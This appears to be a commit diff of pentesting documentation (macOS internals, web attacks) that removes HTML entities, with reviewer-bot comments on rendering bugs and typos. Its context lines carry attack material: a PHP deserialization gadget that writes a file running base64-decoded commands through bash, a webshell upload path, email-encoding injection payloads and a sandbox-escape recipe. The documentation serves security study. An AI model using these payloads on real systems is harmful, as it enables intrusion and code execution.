via the “print object” (po) command. 
If po doesn't produce a meaningful output use <code>x/b</code></p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address<br>memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas current function</p><p>dis -n <funcname> #Disas func</p><p>dis -n <funcname> -b <basename> #Disas func<br>dis -c 6 #Disas 6 lines<br>dis -c 0x100003764 -e 0x100003768 # From one add until the other<br>dis -p -c 4 # Start in current address disassembling</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Check array of 3 components in x1 reg</td></tr><tr><td><strong>image dump sections</strong></td><td>Print map of the current process memory</td></tr><tr><td><strong>image dump symtab <library></strong></td><td><code>image dump symtab CoreNLP</code> #Get the address of all the symbols from CoreNLP</td></tr></tbody></table>
> [!NOTE]
> When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated (“C”) string. To print the name via lldb do:
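Review bot: the placeholders in the breakpoint and memory cells of this table hunk, `b <binname>`main`, `b set -n main --shlib <lib_name>`, `br e/dis <num>` and the `x/s <reg/memory address>` / `x/i <reg/memory address>` / `image dump symtab <library>` headers, are bare `<name>` sequences inside a raw HTML `<table>`, so the browser's HTML parser will treat them as unknown elements and the placeholder text will vanish from the rendered page; with this commit converting `&#x3C;` back to `<` throughout, these cells need `&lt;` / `&gt;` (or the placeholders moved out of raw HTML). The same cell also carries "Strt execution" for "Start execution".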

View File

@ -14,7 +14,7 @@
## Keyloggers detection
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"&#x20;
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"
{{#include ../../banners/hacktricks-training.md}}

View File

@ -18,7 +18,7 @@ This is very helpful to manage parallel execution successfully, greatly reducing
A block is a **self contained section of code** (like a function with arguments returning a value) and can also specify bound variables.\
However, at compiler level blocks doesn't exist, they are `os_object`s. Each of these objects is formed by two structures:
- **block literal**:&#x20;
- **block literal**:
- It starts by the **`isa`** field, pointing to the block's class:
- `NSConcreteGlobalBlock` (blocks from `__DATA.__const`)
- `NSConcreteMallocBlock` (blocks in the heap)
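Review bot: the unchanged context line "at compiler level blocks doesn't exist, they are `os_object`s" should read "blocks don't exist"; worth fixing in the same pass since this hunk already touches the paragraph.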

View File

@ -51,7 +51,7 @@ Using some **social engineering** you could **impersonate for example Google Chr
{{#tab name="Chrome Impersonation"}}
Some suggestions:
- Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array.&#x20;
- Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array.
```bash
#!/bin/sh

View File

@ -52,7 +52,7 @@ The main Nib file is referenced in the value **`NSMainNibFile`** inside the `Inf
### Other Example
In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find tutorial on how to create a dirty nib.&#x20;
In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find tutorial on how to create a dirty nib.
### Addressing Launch Constraints

View File

@ -192,10 +192,10 @@ Process 71019 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
-> 0x181d3ac20 &#x3C;+0>: pacibsp
0x181d3ac24 &#x3C;+4>: sub sp, sp, #0x20
0x181d3ac28 &#x3C;+8>: stp x29, x30, [sp, #0x10]
0x181d3ac2c &#x3C;+12>: add x29, sp, #0x10
-> 0x181d3ac20 <+0>: pacibsp
0x181d3ac24 <+4>: sub sp, sp, #0x20
0x181d3ac28 <+8>: stp x29, x30, [sp, #0x10]
0x181d3ac2c <+12>: add x29, sp, #0x10
Target 0: (SandboxedShellApp) stopped.
<strong>(lldb) bt
</strong>* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
@ -208,7 +208,7 @@ Target 0: (SandboxedShellApp) stopped.
frame #6: 0x0000000181abbbfc libxpc.dylib`_xpc_early_init + 92
frame #7: 0x0000000181a9583c libxpc.dylib`_libxpc_initializer + 1104
frame #8: 0x000000018e59e6ac libSystem.B.dylib`libSystem_initializer + 236
frame #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&#x26;) const::$_0::operator()() const + 168
frame #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&) const::$_0::operator()() const + 168
</code></pre>
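Review bot: replacing `&#x3C;+0>` with `<+0>` is safe in this block only because the HTML tokenizer does not start a tag when `<` is followed by `+` or a digit; the block is raw HTML (note the `<strong>(lldb) bt` wrapper and the closing `</code></pre>`), so any `<` that precedes a letter, `/`, `!` or `?` in these `<pre><code>` listings must stay as `&lt;` or the following token is swallowed as a tag. The `&#x26;)` to `&)` change is fine for the same reason, since `&)` matches no named character reference.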
To get the arguments of **`mach_msg`** check the registers. These are the arguments (from [mach/message.h](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)):

View File

@ -150,7 +150,7 @@ Finally, another important function to make the server work will be **`myipc_ser
OutHeadP->msgh_id = InHeadP->msgh_id + 100;
OutHeadP->msgh_reserved = 0;
if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id &#x3C; 500) ||
if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id < 500) ||
<strong> ((routine = SERVERPREFmyipc_subsystem.routine[InHeadP->msgh_id - 500].stub_routine) == 0)) {
</strong> ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;
((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;
@ -270,13 +270,13 @@ It was previously mentioned that the function that will take care of **calling t
var_10 = arg0;
var_18 = arg1;
// Initial instructions to find the proper function ponters
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f;
*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
*(int32_t *)(var_18 + 0xc) = 0x0;
*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;
*(int32_t *)(var_18 + 0x10) = 0x0;
if (*(int32_t *)(var_10 + 0x14) &#x3C;= 0x1f4 &#x26;&#x26; *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
if (*(int32_t *)(var_10 + 0x14) <= 0x1f4 && *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
rax = *(int32_t *)(var_10 + 0x14);
// Call to sign_extend_64 that can help to identifyf this function
// This stores in rax the pointer to the call that needs to be called
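Review bot: the `&#x3C;=` to `<=` and `&#x26;&#x26;` to `&&` changes in this decompiled listing render correctly (`<` followed by `=` is not a tag opener and `&&` is not a character reference), but the surrounding comment lines still carry typos the commit title is about: "function ponters" should be "function pointers" and "identifyf this function" should be "identify this function".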
@ -318,7 +318,7 @@ This is the same function decompiled in a difefrent Hopper free version:
var_10 = arg0;
var_18 = arg1;
// Initial instructions to find the proper function ponters
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f | 0x0;
*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f | 0x0;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
*(int32_t *)(var_18 + 0xc) = 0x0;
@ -327,19 +327,19 @@ This is the same function decompiled in a difefrent Hopper free version:
r8 = *(int32_t *)(var_10 + 0x14);
r8 = r8 - 0x1f4;
if (r8 > 0x0) {
if (CPU_FLAGS &#x26; G) {
if (CPU_FLAGS & G) {
r8 = 0x1;
}
}
if ((r8 &#x26; 0x1) == 0x0) {
if ((r8 & 0x1) == 0x0) {
r8 = *(int32_t *)(var_10 + 0x14);
r8 = r8 - 0x1f4;
if (r8 &#x3C; 0x0) {
if (CPU_FLAGS &#x26; L) {
if (r8 < 0x0) {
if (CPU_FLAGS & L) {
r8 = 0x1;
}
}
if ((r8 &#x26; 0x1) == 0x0) {
if ((r8 & 0x1) == 0x0) {
r8 = *(int32_t *)(var_10 + 0x14);
// 0x1f4 = 500 (the strating ID)
<strong> r8 = r8 - 0x1f4;
@ -348,13 +348,13 @@ This is the same function decompiled in a difefrent Hopper free version:
var_20 = r8;
r8 = r8 - 0x0;
if (r8 != 0x0) {
if (CPU_FLAGS &#x26; NE) {
if (CPU_FLAGS & NE) {
r8 = 0x1;
}
}
// Same if else as in the previous version
// Check the used of the address 0x100004040 (functions addresses array)
<strong> if ((r8 &#x26; 0x1) == 0x0) {
<strong> if ((r8 & 0x1) == 0x0) {
</strong><strong> *(var_18 + 0x18) = **0x100004000;
</strong> *(int32_t *)(var_18 + 0x20) = 0xfffffed1;
var_4 = 0x0;

View File

@ -28,7 +28,7 @@ Then, it maps the dyld shared cache which prelinks all the important system libr
1. it start loading inserted libraries with `DYLD_INSERT_LIBRARIES` (if allowed)
2. Then the shared cached ones
3. Then the imported ones
1. &#x20;Then continue importing libraries recursively
1. Then continue importing libraries recursively
Once all are loaded the **initialisers** of these libraries are run. These are coded using **`__attribute__((constructor))`** defined in the `LC_ROUTINES[_64]` (now deprecated) or by pointer in a section flagged with `S_MOD_INIT_FUNC_POINTERS` (usually: **`__DATA.__MOD_INIT_FUNC`**).
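Review bot: the numbered list in this hunk restarts at "1. Then continue importing libraries recursively" right after item 3; if that line is meant to be a sub-step of "3. Then the imported ones" it needs to be indented under it, otherwise Markdown renders it as a new list, and the `&#x20;` this commit removes was most likely GitBook's leftover from that nesting. The first item also reads "it start loading" for "it starts loading".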

View File

@ -36,8 +36,8 @@ These are some of the MACF policies it registers:
- **`vnode_check_exec`**: Gets called when a executable files are loaded in memory and sets `cs_hard | cs_kill` which will kill the process if any of the pages becomes invalid
- **`vnode_check_getextattr`**: MacOS: Check `com.apple.root.installed` and `isVnodeQuarantined()`
- **`vnode_check_setextattr`**: As get + com.apple.private.allow-bless and internal-installer-equivalent entitlement
- &#x20;**`vnode_check_signature`**: Code that calls XNU to check the code signature using entitlements, trust cache and `amfid`
- &#x20;**`proc_check_run_cs_invalid`**: It intercepts `ptrace()` calls (`PT_ATTACH` and `PT_TRACE_ME`). It checks for any of the entitlements `get-task-allow`, `run-invalid-allow` and `run-unsigned-code` and if none, it checks if debugging is permitted.
- **`vnode_check_signature`**: Code that calls XNU to check the code signature using entitlements, trust cache and `amfid`
- **`proc_check_run_cs_invalid`**: It intercepts `ptrace()` calls (`PT_ATTACH` and `PT_TRACE_ME`). It checks for any of the entitlements `get-task-allow`, `run-invalid-allow` and `run-unsigned-code` and if none, it checks if debugging is permitted.
- **`proc_check_map_anon`**: If mmap is called with the **`MAP_JIT`** flag, AMFI will checks for the `dynamic-codesigning` entitlement.
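Review bot: two context lines of this hunk still have grammar slips: "Gets called when a executable files are loaded" should be "when an executable file is loaded", and "AMFI will checks for the `dynamic-codesigning` entitlement" should be "AMFI will check".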
`AMFI.kext` also exposes an API for other kernel extensions, and it's possible to find its dependencies with:

View File

@ -26,7 +26,7 @@ MACF use **labels** that then the policies checking if they should grant some ac
## MACF Policies
A MACF Policy defined **rule and conditions to be applied in certain kernel operations**.&#x20;
A MACF Policy defined **rule and conditions to be applied in certain kernel operations**.
A kernel extension could configure a `mac_policy_conf` struct and then register it calling `mac_policy_register`. From [here](https://opensource.apple.com/source/xnu/xnu-2050.18.24/security/mac_policy.h.auto.html):
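Review bot: the line this hunk changes, "A MACF Policy defined **rule and conditions to be applied in certain kernel operations**", still has the wrong tense and number; it should read "A MACF Policy defines **rules and conditions to be applied in certain kernel operations**".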
@ -115,7 +115,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval)
#if CONFIG_MACF
<strong> error = mac_file_check_mmap(vfs_context_ucred(ctx),
</strong> fp->fp_glob, prot, flags, file_pos + pageoff,
&#x26;maxprot);
&maxprot);
if (error) {
(void)vnode_put(vp);
goto bad;
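Review bot: `&#x26;maxprot` to `&maxprot` happens to render literally because `&max` is not a prefix of any HTML named character reference, but this is a raw `<pre><code>` block (see the `<strong>` wrapper two lines up), and a bare `&` followed by a legacy reference name that needs no semicolon (`&lt`, `&amp`, `&copy`, `&reg`) would be decoded by the browser; in these HTML listings `&amp;` is the spelling that is always safe, so the blanket `&#x26;` to `&` rewrite should be checked per occurrence rather than applied globally.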

View File

@ -44,7 +44,7 @@ Check the [**original report here**](https://perception-point.io/blog/technical-
The **`open`** utility also supported the **`--stdin`** param (and after the previous bypass it was no longer possible to use `--env`).
The thing is that even if **`python`** was signed by Apple, it **won't execute** a script with the **`quarantine`** attribute. However, it was possible to pass it a script from stdin so it won't check if it was quarantined or not:&#x20;
The thing is that even if **`python`** was signed by Apple, it **won't execute** a script with the **`quarantine`** attribute. However, it was possible to pass it a script from stdin so it won't check if it was quarantined or not:
1. Drop a **`~$exploit.py`** file with arbitrary Python commands.
2. Run _open_ **`stdin='~$exploit.py' -a Python`**, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since its a child process of _launchd_, it isnt bound to Words sandbox rules.

View File

@ -230,7 +230,7 @@ The command **`diskutil apfs list`** lists the **details of the APFS volumes** a
| Capacity In Use By Volumes: 219214536704 B (219.2 GB) (44.3% used)
| Capacity Not Allocated: 275170258944 B (275.2 GB) (55.7% free)
| |
| +-&#x3C; Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE
| +-< Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE
| | -----------------------------------------------------------
| | APFS Physical Store Disk: disk0s2
| | Size: 494384795648 B (494.4 GB)

View File

@ -70,7 +70,7 @@ Opened URL: iGoat://?contactNumber=0&message=0
## Custom URL scheme hijacking
According to [**this post**](https://evanconnelly.github.io/post/ios-oauth/), malicious apps could **register other apps custom schemes,** then the malicious app can open a browser that has all the cookies of the Safari App with [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
According to [**this post**](https://evanconnelly.github.io/post/ios-oauth/), malicious apps could **register other apps custom schemes,** then the malicious app can open a browser that has all the cookies of the Safari App with [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).
With the broser the malicious app can load an attackers controlled web page and TCC will ask the mobile user for permissions to open that app. Then, the malicious webpage could redirect to a victim page, for example an OAuth flow with the parameter `prompt=none`. If the user was already logged in the OAuth flow, the OAuth flow will send the secret back to the victim application using the custom scheme of the victim app.\
However, because the malicious app also registered it and because the used browser is inside the malicious app, the custom scheme will be handled in this case by the malicious app which will be able to steal the OAuth token.
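Review bot: beyond the trailing `&#x20;` this hunk removes, the paragraph has "register other apps custom schemes" (should be "other apps' custom schemes"), "With the broser" (should be "browser") and "attackers controlled web page" (should be "attacker-controlled web page").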

View File

@ -14,7 +14,7 @@ Sadly the syntax description isnt really clear and a simple help command list
| Command | Description | Example |
| -------------------- | --------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------- |
| get | Reads a value | `get mykey` |
| set | Set a key unconditionally | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example&#x3C;/p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| set | Set a key unconditionally | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example</p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| add | Add a new key | `add newkey 0 60 5` |
| replace | Overwrite existing key | `replace key 0 60 5` |
| append | Append data to existing key | `append key 0 60 15` |
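Review bot: the rewritten `set` row breaks the table in three ways. `<flags> <ttl> <size>` are now bare tags inside `<code>`, so the HTML parser drops them; the original `&#x3C;p>Ensure ... &#x3C;/p>` rendered as literal text, whereas the new `<p>` opens a second paragraph inside the outer `<p>` and the parser auto-closes the first one; and the unescaped `|` in `printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211` is a cell separator in a GFM table even inside a code span, so it needs `\|`. The separator row also has four column groups while the header has three.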

View File

@ -10,7 +10,7 @@ A notable aspect of this protocol is its lack of built-in **authentication** or
Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Consequently, the protocol is best suited for use within **trusted networks**, given its reliance on this method of authentication.
**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).&#x20;
**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).
```
2049/tcp open nfs 2-3 (RPC #100003

View File

@ -39,7 +39,7 @@ Then access to **`/Portals/0/shell.asp`** to access your webshell.
### Privilege Escalation
You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.&#x20;
You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -98,7 +98,7 @@ public class helloworld implements Macro {
}
```
It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user.&#x20;
It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user.
Once a XSS is found, in [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) you can find some payloads to increase the impact of the XSS.

View File

@ -79,7 +79,7 @@ location = /admin/ {
>
> A regex can also be vulnerable like:
>
> `location ~ /docs/([^/])? { … $1 … }` - Vulnerable&#x20;
> `location ~ /docs/([^/])? { … $1 … }` - Vulnerable
>
> `location ~ /docs/([^/\s])? { … $1 … }` - Not vulnerable (checking spaces)
>

View File

@ -370,7 +370,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
Knowing how a Wordpress plugin can expose functionality is key in order to find vulnerabilities on its functionality. You can find how a plugin might expose functionality in the following bullet points and some example of vulnerable plugins in [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
- **`wp_ajax`**&#x20;
- **`wp_ajax`**
One of the ways a plugin can expose functions to uses if via AJAX handlers. These ones could contain logic, authorization, or authentication bugs. Moreover, it's kind of frquelty that these functions are going to base both the authentication and authorization in the existence of a wordpress nonce which **any user authenticated in the Wordpress instance might have** (independently of its role).
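Review bot: the context line after the `wp_ajax` bullet reads "expose functions to uses if via AJAX handlers" (should be "to users is via AJAX handlers") and "it's kind of frquelty" (should be "frequent"); since the commit is a typo sweep these belong in it.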

View File

@ -29,7 +29,7 @@ Other specific delimiters might be found following this process:
### **Encodings**
Different HTTP servers and proxies like Nginx, Node, and CloudFront decode delimiters differently, leading to inconsistencies across CDNs and origin servers that could be exploited. For example, if the web server perform this transformation `/myAccount%3Fparam``/myAccount?param` but the cache server keeps as key the path `/myAccount%3Fparam`, there is an inconsistency.&#x20;
Different HTTP servers and proxies like Nginx, Node, and CloudFront decode delimiters differently, leading to inconsistencies across CDNs and origin servers that could be exploited. For example, if the web server perform this transformation `/myAccount%3Fparam``/myAccount?param` but the cache server keeps as key the path `/myAccount%3Fparam`, there is an inconsistency.
A way to check for these inconsistencies is to send requests URL encoding different chars after loading the path without any encoding and check if the encoded path response came from the cached response.
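Review bot: in the changed line the two code spans run together, `/myAccount%3Fparam``/myAccount?param`, so the arrow or "to" between the before and after paths has been lost and the sentence no longer says what the transformation is; restore it as `/myAccount%3Fparam` → `/myAccount?param`. "if the web server perform" should also be "performs".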

View File

@ -97,8 +97,8 @@ background: #F00;
If you have identified an **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\
Example:\
_&#x59;ou found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters._\
\_\_An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**.
You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters.\
An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**.
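Review bot: dropping the stray `\_\_` and the `&#x59;` escape is correct, but note that the rewrite also removes the `_..._` italics that wrapped the example, which is fine as long as that was intended. The sentence still reads "**tricking** the **user** into **Submit** the form"; it should be "into submitting the form".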
## Strategies to Mitigate Clickjacking

View File

@ -161,11 +161,11 @@ If a platform is taking **data from an HTTP request and using it without sanitiz
For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers:
<figure><img src="../images/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
<figure><img src="../images/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop"><figcaption></figcaption></figure>
Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know:
<figure><img src="../images/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
<figure><img src="../images/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop"><figcaption></figcaption></figure>
### How to Prevent CRLF / HTTP Header Injections in Web Applications
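Review bot: in both `<figure>` lines the `alt` attribute holds the GitBook asset URL rather than a description of the screenshot, so screen readers get a URL; and inside an HTML attribute value the correct escaping of the query-string separator is `&amp;`, so `&#x26;` to `&` here is tolerated by browsers but is the one place in this sweep where the entity was actually right. The context paragraph also has "memcache comands", "the vistims details" and "usrnames", and "a user shuold connect to".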

View File

@ -52,7 +52,7 @@ In my case, I didnt have anything like that, but there was inside the **same
a:2:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}}
```
- Now, we can **create and write a file**, however, the user **couldnt write in any folder inside the web server**. So, as you can see in the payload, PHP calling **`system`** with some **base64** is created in **`/tmp/a.php`**. Then, we can **reuse the first type of payload** that we used to as LFI to load the composer loader of the other webapp t**o load the generated `/tmp/a.php`** file. Just add it to the deserialization gadget:&#x20;
- Now, we can **create and write a file**, however, the user **couldnt write in any folder inside the web server**. So, as you can see in the payload, PHP calling **`system`** with some **base64** is created in **`/tmp/a.php`**. Then, we can **reuse the first type of payload** that we used to as LFI to load the composer loader of the other webapp t**o load the generated `/tmp/a.php`** file. Just add it to the deserialization gadget:
```php
a:3:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}s:6:"Extra3";O:5:"tmp_a":0:{}}
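Review bot: the bold marker in the changed line is inside a word, "of the other webapp t**o load the generated `/tmp/a.php`** file", so the emphasis opens mid-word; it should be "**to load the generated `/tmp/a.php`** file". The same sentence has "that we used to as LFI", presumably "that we used as LFI".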

View File

@ -154,7 +154,7 @@ JSONMergerApp.run(json_input)
### ActiveSupports `deep_merge`
This isn't vulnerable by default but can be made vulnerable with something like:&#x20;
This isn't vulnerable by default but can be made vulnerable with something like:
```ruby
# Method to merge additional data into the object using ActiveSupport deep_merge

View File

@ -91,11 +91,11 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
### Whitelist bypass
<figure><img src="../images/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (812).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### Quotes
<figure><img src="../images/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (626).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### IPs
@ -149,7 +149,7 @@ x@xn--svg/-9x6 → x@<svg/
Payloads:
- Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
- Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`&#x20;
- Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`
- It'll send the verification email to `collab@psres.net`
- Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
- Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
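Review bot: in the changed bullet, `=40` is the only encoded token left outside a code span while `=3e` and `=00` are in backticks; make it `=40` for consistency. The following Zendesk bullet also has "encoded qoute" and "close some qoutes" for "quote" / "quotes".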
@ -177,7 +177,7 @@ Some services like **github** or **salesforce allows** you to create an **email
### Account-Takeover
If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
_&#x4E;ote that salesforce indicates if the given email was or not verified but so the application should take into account this info._
_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
## Reply-To

View File

@ -681,7 +681,7 @@ lfi2rce-via-eternal-waiting.md
If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (You need to include the same one 2 time to throw that error).
**I don't know how is this useful but it might be.**\
_&#x45;ven if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
_Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>

View File

@ -206,7 +206,7 @@ In the RFC2109 it's indicated that a **comma can be used as a separator between
#### Bypassing value analysis with cookie splitting
Finally different backdoors would join in a string different cookies passed in different cookie headers like in:&#x20;
Finally different backdoors would join in a string different cookies passed in different cookie headers like in:
```
GET / HTTP/1.1
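Review bot: the changed line says "Finally different backdoors would join in a string different cookies passed in different cookie headers"; in the cookie-splitting context this is almost certainly "different backends", which is a meaning-changing typo this commit should catch rather than just the trailing `&#x20;`.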

View File

@ -207,9 +207,9 @@ await prisma.article.findMany({
```
> [!CAUTION]
> Using operations like `startsWith` it's possible to leak information.&#x20;
> Using operations like `startsWith` it's possible to leak information.
- **Many-to-many relational filtering bypassing filtering:**&#x20;
- **Many-to-many relational filtering bypassing filtering:**
```javascript
app.post("/articles", async (req, res) => {

View File

@ -4,13 +4,13 @@
It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
<figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
**OTP Bypass / Bruteforce** would work like this:
<figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
